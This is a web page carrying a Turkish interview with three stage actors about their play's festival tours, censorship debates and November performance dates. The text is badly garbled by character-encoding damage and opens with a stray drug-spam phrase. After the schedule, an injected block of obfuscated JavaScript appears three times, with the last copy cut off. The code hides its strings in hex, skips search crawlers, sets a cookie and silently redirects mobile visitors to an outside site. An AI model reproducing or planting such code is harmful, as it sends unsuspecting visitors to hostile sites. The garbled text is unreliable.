Cefadroxil tablet price Selin Ai??AYcan: AAi??Ai??kAi??asAi?? yazAi??lar Ai??Ai??kmaya baAYlayAi??nca geliyor seyirci. ai???The Listai??? bizi ikinci haftasAi??nda birinci sAi??raya koydu. ai???Hitlistai???te bir numarada gAi??sterdi bizi. Bunlar Ai??ok etkili oluyor. 3000ai??i??in A?zerinde oyun var, ai???Ai??mparatorluk Kuranlarai???Ai?? ‘En Ai??yiler Listesi’nde 1 numarada gAi??stermesi muhteAYem bir AYey oldu…
Reha Ai??zcan: Ama durup dururken gelmiyor. Yine Selin inanAi??lmaz Ai??zverili Ai??alAi??AYAi??yor oralarda. AkAYam yorucu bir oyun oynamasAi??na, oyunda dA?nyanAi??n dayaAYAi??nAi?? yemesine raAYmen sabahAi??n kAi??rA?nde kalkAi??yor. Belki binlerce insanAi??n olduAYu kuyruklara girip o tanAi??tAi??m dosyasAi??nAi?? anlatAi??yor. Bunu bir oyuncunun, bir tiyatro sahibinin yapmasAi?? saAi??malAi??k. BunlarAi??n hepsinin departmanAi??nAi??n ayrAi?? olmasAi?? lazAi??m ama bA?tA?n bu departmanlar TA?rkiye’de eAYittir ekstra para demek. BunlarAi?? karAYAi??layabilecek bir bA?tAi??e kurumsal tiyatrolarda da yok. DolayAi??sAi??yla da eAYer tiyatronun sahibiyseniz, bA?tA?n bunlarAi?? angaryadan Ai??Ai??karAi??r gAi??rev haline getirirsiniz.

Azimdi bA?tA?n bu evrenselden bahsederken, size yurda hoAYgeldin hediyesi olan ai???milli, yerliai??? beyanlarAi??nAi?? nasAi??l karAYAi??ladAi??nAi??z?
Selin Ai??AYcan: Ai??yle deAYilmiAY, zaten aAi??Ai??klandAi?? ama ortada bA?yA?k bir yAi??netememe problemi var. BasAi??n aAi??Ai??klamasAi??nda Ai??ok bA?yA?k bir problem var. Bu Dario Foai??i??nun, ai???The Timesai???taki rAi??portajAi??na kadar gidebiliyorsa; Nobel Ai??dA?llA?, bizim de Ai??ok saygAi?? duyduAYumuz efsanevi bir yazar 90 yaAYAi??nda ai???Ai??ehov, Shakespeare ve benim oyunlarAi??m TA?rkiye’de yasaklanmAi??AYai??? diye The Times’a rAi??portaj veriyor. Rezil oluyoruz… Milano’dan haber beklediAYimiz iAi??in Ai??talyan basAi??nAi??nAi?? takip ediyorum biraz. Ai??talyan basAi??nAi??nda ai???Dario Foai??i??nun TA?rkiye’de oyunlarAi?? yasaklandAi??ai??? diye Ai??ok bA?yA?k Ai??Ai??ktAi?? bu haberler. Fakat bAi??yle bir AYey yok. Zaten Devlet Tiyatrosuai??i??nun yasakladAi??AYAi?? da yok. YAi??neticiler bu ‘yerli oyun’ sA?recini yanlAi??AY yansAi??tarak TA?rkiye’nin yurtdAi??AYAi??ndaki imajAi??nAi?? zedeledi.
AyAYe Lebriz:Yani mesele yerli oyun, yabancAi?? oyun gibi bAi??yle bir ayrAi??m yapAi??lmasAi?? deAYil. Tabii ki yerli yazarlarAi??mAi??z yani bize ait bu coAYrafyanAi??n yazarlarAi??nAi??n oynanmasAi?? Ai??ok gurur verici bir AYey. BakAi??n ne olduAYu deAYil neyin nasAi??l ve niye yapAi??ldAi??AYAi?? bizim kriterimiz olmalAi??. Hatta Rehaai??i??nAi??n o konuda Ai??ok gA?zel bir yazAi??sAi?? vardAi??. YA?rekten katAi??ldAi??m ona. NasAi??l yapAi??ldAi??AYAi??nAi?? tartAi??AYmalAi??yAi??z biz. Ai??ok deAYerli pek Ai??ok yazarAi??mAi??z var; bir de mA?thiAY bir edebiyatAi??mAi??z var ve harikulade oyunlaAYtAi??rmalar da yapAi??labiliniyor. HiAi?? kimsenin telaffuz etmediAYi dAi??rt beAY tane yazar var keAYke oyunlarAi?? yapAi??lsa! AyrAi??ca bir de genAi?? yazarlarAi??mAi??z da var. GAi??nA?l ister ki eAYer bAi??yle bir AYey yapAi??yorsak, o zaman bunu bir kurumsal tiyatro olarak destekleyeceAYiniz baAYka yan damarlarAi?? ile birlikte sunabilseniz. Bir kurum olarak bir AYeye Ai??nayak olunmasAi?? ne kadar kAi??ymetli olur. Ai??ok AYey yapAi??labilir. Biraz dA?AYA?nA?nce neler neler akla geliyor.
Reha Ai??zcan: HiAi?? bilmediAYimiz bir yazar da olabilir. AyrAi??ca bu Ai??ok gA?dA?k bir tartAi??AYma. Ai??A?nkA? ai???Mona Lisa Tablosuai??? oyununu seyrettiAYiniz zaman size yerli gelmiyorsa… Bir sA?rA? oyun seyrettik ve seyrettiAYimiz oyunlar son derece yerliydi. Azimdi ben ai???Ai??mparatorluk Kuranlarai??? oyununda ai???Dupontai??? oynuyorum diye FransAi??z falan deAYilim. Biz gayet yerli bir oyunun iAi??indeyiz. Bizim derdimizi anlatabilen, derdimiz ile buluAYma noktalarAi?? olan ve bunu 50ai??i??li yAi??llarda bulan bir yazarla yolculuk yapAi??yorum. Bunu Murathan yazsa ne olur, Boris Vian yazsa ne olur, yabancAi?? bir yazar yazsa ne olur, yerli bir yazar yazsa ne olur?

09

YalnAi??zAi??z diyorsunuz. Bu oyunda da baAYka tA?rlA? bir yalnAi??zlAi??k, yalnAi??zlaAYma var. KaAi??arak, unutarak, hatAi??rasAi??zlaAYarak, yok sayarak, inkA?r ederek yalnAi??zlaAYAi??yorsun. Niye yA?zleAYmek bu kadar zor? Niye o konfordan vazgeAi??emiyoruz? Yine de ai???AzA?mA?rzai??? umut oluyor.
Reha Ai??zcan: Bence de umutlu bir AYey ama AYimdi iAi??in deAYil bu umut. Ai??ok sonrasAi?? iAi??in bir umut olabilir bu. OynandAi??AYAi?? iAi??in ya da bu yazAi??ldAi??AYAi?? iAi??in evet umut bitmez. 60 sene, 65 sene sonra tekrar oynandAi??AYAi?? iAi??in bu umut. DoAYru, umut hayatAi??n devamlAi??lAi??AYAi?? adAi??na, yaAYama sevinci adAi??na, yaAYamak keyfi adAi??na, yaAYama keyfini pekiAYtirebilecek unsurlarAi?? hayata geAi??irmek adAi??na gerekli. O yA?zden yaptAi??AYAi??mAi??z AYeyin deAYerli olduAYunu dA?AYA?nA?yorum. Bir insan kendi iAi??inde yalnAi??zlaAYAi??r, bir de yalnAi??zlaAYtAi??rAi??lAi??r. Biz AYu anda yalnAi??zlaAYtAi??rAi??lma sA?recini yaAYAi??yoruz. YalnAi??zlaAYtAi??rAi??lAi??p yok edilebiliriz. Orada tehlike var. Onun iAi??in gidiyoruz Avignon’a, Edinburgh’a, ne bileyim Milano’ya. Yunanistan’a gideceAYiz. Derdimizi anlatacaAYAi??z. Daha Ai??ok yapacaAYAi??z, daha Ai??ok Ai??alAi??AYacaAYAi??z, daha anlaAYAi??lAi??r, daha kendimize ait bir AYeylerle yeniden var olacaAYAi??z ki umut pekiAYsin. Yoksa umut yok.

Umut, yaAYama katAi??lmak iAi??in gerekli artAi??k.
Reha Ai??zcan: O 40 sene Ai??nceki aAi??Ai??AYAi??mAi??z artAi??k. O yA?zden, evet matematik zekamAi??z da fena deAYildi ama o bAi??lA?mleri deAYil; konservatuvarAi?? seAi??tik. Ai??A?nkA? biliyoruz ki yarAi??n daha gA?zel bir gA?n olacak. Biz ona inandAi??k. Ai??A?nkA? biz Aziz Nesin ile bA?yA?dA?k. YaAYar Kemal ile, NazAi??m Hikmet ile bA?yA?dA?k. Bu A?lkenin sanatAi??Ai??larAi??na hayranlAi??kla baAYladAi??k. Ve o bayrakta devam ediyoruz. Zaten baAYka tA?rlA? olmaz bu iAYi seAi??tiAYin anda.

img_0436

Oyun sorular sorduruyor. Benim iAi??in Ai??nemli olan da o. DoAYru sorularAi?? bulmak cevaplarAi?? bulmaktan Ai??nemli. Bilinmeyenden korkmak, korkudan korkmak bize neleri kaybettiriyor? Sizin sorularAi??nAi??z ya da cA?mleleriniz ne oldu oyuna dair?
Reha Ai??zcan: Bu oyunun her sahnesinde bir sA?rA? Ai??nemli laf vardAi?? bence ama bizim bu yolculuAYumuz prova ile baAYlayAi??p ondan sonra bu turnelerle devam ettiAYi zaman gAi??rmA?AY olduAYum bir AYey var: Oyunu ben AYu anda sahneye koysam herhalde; oyunun 1. perdesini TA?rkAi??e, 2. perdesini FransAi??zca ve 3. perdesini de Ai??ngilizce oynatAi??rAi??m. Ai??A?nkA? bu bA?tA?n dA?nyanAi??n sAi??kAi??ntAi??sAi?? ve bunu kafaya kakmak gerekiyor. Ai??teleAYtirmeden, orada Ai??yle AYeyler oluyor. HayAi??r, burada da oluyor! Her yerde oluyor. Bitmeyecek bu sAi??kAi??ntAi??. Ai??A?nkA? ilkel benlik ve yaAYama kaygAi??sAi?? girdiAYi zaman iAYin iAi??ine, kimin ne yapacaAYAi?? belli olmuyor. O an da bulduAYun AYey neyse, o senin hayatAi??n. Ai??stediAYin kadar oku, et, ne yaparsan yap. Boris Vian buradan Ai??ok beslenmiAY.
AyAYe Lebriz:GA?zel olan AYey AYu: Ai??yle bir metin hediye etmiAY ki bize. Her dAi??nem iAi??in yeniden okumasAi??nAi?? yapAi??p, yeniden yorumlanabilecek gA?ce sahip bir metin var ortada. DolayAi??sAi??yla tek bir cA?mleyle anlatAi??labilecek gibi deAYil; zengin bir metin bu. GA?zel olan o. Evrensel bir mesele var. Herkesin iAi??inde bir korku var ve o korkunun esiri olmuAY, artAi??k tepki de veremeyecek halde ve pek Ai??ok AYeyin A?stA?nA? Ai??rtA?yoruz. ai???Tamam yok bir AYeyai??? diyoruz. Azurada bir kavga olmuAY olsa ya da bir kadAi??n bAi??Ai??aklansa, herkes ai???tamam, yok bir AYeyai??? diyecek. ai???Aman bir AYey olmasAi??nai???, ai???Aman bir AYeye dokunmasAi??nai??? yeter ki… Oyuncu olarak ai??i??bu oyunu oynarken- bu hesaplaAYmayAi?? ben kendim yapamAi??yorsam, bunun bir anlamAi?? yok. Biz de oradaki gelen seyircilerden biriyiz. Biz de burada yaAYAi??yoruz. Hem bir dA?nya vatandaAYAi?? hem de bu A?lkenin bir vatandaAYAi?? olarak biz de her oyunda seyirciyle beraber yeniden dA?AYA?nA?yoruz. Herkes bize soruyor: ai???A?st yazAi?? ile mi oynadAi??nAi??z?ai??? diye… Evet, A?st yazAi?? vardAi?? ama birtakAi??m izleyenlerden AYAi??yle bir geri dAi??nA?AY de aldAi??k: ai???ai??i??bir sA?re sonra, ona baksak da olur, bakmasak da olur; biz ne anlatmak istediAYinizi anladAi??k.ai??i??ai??i?? Ai??A?nkA? bu mesele dA?nyanAi??n her yerinde artAi??k ai???hepimizinai??i?? meselesi.
Selin Ai??AYcan: A?st yazAi?? deyince aklAi??ma geldi: Avignonai??i??da da pek yapAi??lmayan bir AYey yaptAi??k. Avignonai??i??da hem Ai??ngilizce hem FransAi??zca A?st yazAi?? ile oynadAi??k. Bunu seAi??tik. Bunu, ai???internationalai??? dAi??AYAi??nda da baAYka hiAi??bir tiyatroda gAi??rmedim. Mesela bu da Ai??nemliydi bence. Sadece FransAi??z seyirciye de hitap etmek istemedik orada. Ai??A?nkA? festivali dA?nyanAi??n her yerinden gelen insanlar, sanatseverler takip ediyor.
Reha Ai??zcan: Bir de AYu Ai??nemli galiba. GittiAYimiz iki festivalde de temalar vardAi??. BA?tA?n oyunlar bunun A?zerineydi. Tema: GAi??Ai??menlik ve olduAYu yeri terk etmek A?zerineydi. Bu, bA?tA?n oyunlarda vardAi??. Bizim oyunda da vardAi??. YasaklAi?? zihniyet ya da yasaksAi??z zihniyet hiAi?? Ai??nemli deAYil. Sanat kendi akAi??AYAi??nAi?? sA?rdA?rA?r her AYeye raAYmen. Kimsenin tekelinde deAYil bu. Bizim tekelimizde deAYil ise tiyatro yapmak, yasaklayanlarAi??n da tekelinde deAYil. Fark etmiyor, hemen evin alt katAi??nda da yapAi??lAi??r. Orada serbest bAi??rakmAi??AYlar ve o serbest bAi??raktAi??klarAi?? zihniyetten gelen oyunlarda AYAi??yle bir AYey var: Siz burada kendinizi huzurlu hissediyorsunuz, Ai??yle mi? GAi??rA?n bakalAi??m ileride neler olacak? Siz Avrupa BirliAYiai??i??siniz, rahatsAi??nAi??z deAYil mi? Hadi bakalAi??m sizin baAYAi??nAi??za neler gelecek? YasaklayAi??n hadi bakalAi??m, TA?rkiye’nin orada savaAYmasAi??na izin verin. TA?rkiye’nin doAYusunda, Ai??ran A?zerindeki, Suriye A?zerindeki emellerini gerAi??ekleAYtirin. Siz burada rahat oturabileceAYiniz mi sanAi??yorsunuz? BA?tA?n oyunlar A?Ai?? aAYaAYAi?? beAY yukarAi?? kendilerine yarattAi??klarAi??, kendilerine kurduklarAi?? o korkuyla yA?zleAYmek Ai??abasAi?? iAi??erisindeydi. Bizim oyunumuz ise bundan kaAi??Ai??AY. Onlar yA?zleAYme A?zerine oyunlar yapAi??yordu ve hAi??nca hAi??nAi?? doluydu. Ve bunlar A?stelik ai???internationalai???da yapAi??yor, ai???offai???larda falan deAYil. KaAi??mak yerine aAi??mak lazAi??m. AynAi?? AYekilde, kurum tiyatrolarAi??nAi??n kapatAi??lmasAi?? yerine Almanya’da, BelAi??ika’da, Hollanda’da, TA?rklerin olduAYu yerlerde de aAi??mak lazAi??m.
Selin Ai??AYcan: Bizim oyunla ilgili tam olarak bu mA?lteci konusuyla ilgili yine Rachel Bowles (galiba ben en Ai??ok onunkini beAYenmiAYim) AYAi??yle yazdAi??: ai??? Modern baAYlamda Ai??ngiltere’nin AB’den Ai??Ai??kmasAi??, Amerika ve Avrupa’da faAYizme doAYru kayan dA?AYA?ncelerle birlikte dA?AYA?nA?ldA?AYA?nde, Hayal Perdesinin bu oyunu gAi??Ai??menlerin ve mA?ltecilerin genel olarak Ai??ektiAYi acAi??lar iAi??in bir ses getirebilme Ai??zelliAYi taAYAi??maktadAi??r.ai??? Biz de aslAi??nda ona biraz dahiliz.
Reha Ai??zcan: Zaten bizim oyun da onun iAi??inde. Festivalin konseptine uygun bir oyun. Biz de zaten bu oyunu seAi??erken bunun kokusunu aldAi??k.
AyAYe Lebriz:DA?nyanAi??n herhangi bir yerinde olan bir olayAi??n, ondan binlerce kilometre uzaklAi??ktaki bir insanAi??n midesine bir kramp sokmamasAi?? diye bir AYeyin kabul edilebilir bir yanAi?? yok. Ai??A?nkA? domino taAYlarAi?? gibi birbirini etkileyen bir durum var, istediAYiniz kadar sAi??nAi??rlarAi??nAi??zAi?? kapatAi??n. Sosyal medyada yabancAi?? birinin paylaAYtAi??AYAi?? bir haberin altAi??na yorumlar yazAi??lmAi??AYtAi??. Biri, ai???Tamam canAi??m. Yani AYimdi Ai??ngiltere’de benim baAYAi??ma bAi??yle bir AYey gelse, bir savaAY olmuAY olsa, niye gideyim Suriye’ye veya uzaktaki baAYka bir yere. Gitsem gitsem iAYte AYuraya giderimai??? diye Avrupadaki bir iki A?lke adAi??nAi?? yazmAi??AY. Biri de cevap vermiAY ai???ai??i?? Ne yazdAi??AYAi??nAi??zAi??n farkAi??nda mAi??sAi??nAi??z? diye. ai???ai??i??GidebileceAYin bA?tA?n komAYularAi??nda savaAY varsa nereye gideceksin?ai??i??ai??i?? demiAY… SaAYAi??na dAi??nse savaAY, soluna dAi??nse savaAY, Ai??nA?ne baksa savaAY, arkasAi??na baksa savaAY. BAi??yle bir bakAi??AYa hakikaten bu oyunlarAi??n birer ayna olmasAi??nAi?? diliyorum.
Reha Ai??zcan: AslAi??ndaAi?? Edinburgai??i??daki kaleye gitse, bunun Ai??yle olmadAi??AYAi??nAi?? gAi??rA?r. Ai??A?nkA? kalede Ai??skoAi??ya’danAi?? Gelibolu’ya gelip AYehit olmuAYlarAi??n anAi??tAi?? var. KapAi?? gibi bir yA?zleAYme ve adamlar niye Ai??skoAi??yaai??i??dan kalkAi??p gelmiAYiz, ne iAYimiz var diye soruyorlar.
AyAYeAi?? Lebriz: O acAi??yAi?? iAi??inde duyumsamamak diye bir AYey olamaz. Bu meseleler hepimizin meselesi artAi??k.

26

Ai??ok sert bir yA?zleAYme bu ve herkes ne ile yA?zleAYiyorsa, ai???yA?zleAYebiliyorsaai???, daha iyi bir insan olma yolunda devam edebiliyor olmasAi??, yAi??nA?nA? deAYiAYtirebiliyor olmasAi?? Ai??ok Ai??nemli bence bu oyunun sonunda. Sezon oyun tarihleriniz belli mi?
Selin Ai??AYcan: ai???A?Ai?? KAi??z KardeAYai??? 21 KasAi??m Pazartesi, Ai??KSV Salon’da oynanAi??yor. Avignon’un ardAi??ndan 4 Ekimai??i??de KAi??brAi??s Tiyatro Festivali’nde sahnelendi. ai???Ai??mparatorluk Kuranlarai??? da 18 KasAi??m Cuma akAYamAi?? Sahne Pulcherie’de izlenebilir. KasAi??mda Ai??mparatorluk Kuranlar’Ai??n Ankara ziyareti olacak gibi gAi??rA?nA?yor. Oyun saatleri 20:30 ve Sahne Pulscherie’deki oyunlarAi??mAi??z FransAi??zca A?styazAi??lAi?? olarak sahnelenecek. Hayal Perdesi BeyoAYlu web sitesinden veya sosyal medya hesaplarAi??ndan program takip edilebilir.

Ai??Sevgili AyAYe Lebriz Berkem, Reha Ai??zcan ve Selin Ai??AYcan, sizlere teAYekkA?r etmenin kendimce bir yolunu buldum diye mutluyum. Yolunuz aAi??Ai??k olsun.

Ai??mparatorluk Kuranlar KasAi??m ayAi?? oyun tarihleri aAYaAYAi??daki gibidir…
18 KasAi??m Cuma 20:30 – Sahne Pulcherie *FransAi??zca A?st yazAi??lAi??
24 KasAi??m PerAYembe 20:30 Massk Sahne
27 KasAi??m Pazar 17:00 Ai??Massk Sahne
29 KasAi??m SalAi?? 20:00 Hayal Perdesi BeyoAYlu

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( 